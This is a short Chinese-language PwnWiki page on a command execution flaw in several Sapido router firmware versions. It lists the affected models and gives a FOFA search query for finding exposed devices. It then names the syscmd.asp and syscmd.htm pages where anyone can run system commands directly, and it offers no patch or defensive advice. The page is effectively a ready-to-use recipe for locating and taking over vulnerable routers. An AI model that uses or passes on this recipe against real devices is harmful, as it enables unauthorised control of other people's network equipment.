Sapido多款路由器命令执行漏洞

From PwnWiki
This page is a translated version of the page Sapido多款路由器命令執行漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞影响

BR270n-v2.1.03

BRC76n-v2.1.03

GR297-v2.1.3

RB1732-v2.0.43


FOFA

app="Sapido-路由器"

漏洞利用

访问目标,直接输入系统命令即可执行。

http://xxx.xxx.xxx.xxx/syscmd.asp
http://xxx.xxx.xxx.xxx/syscmd.htm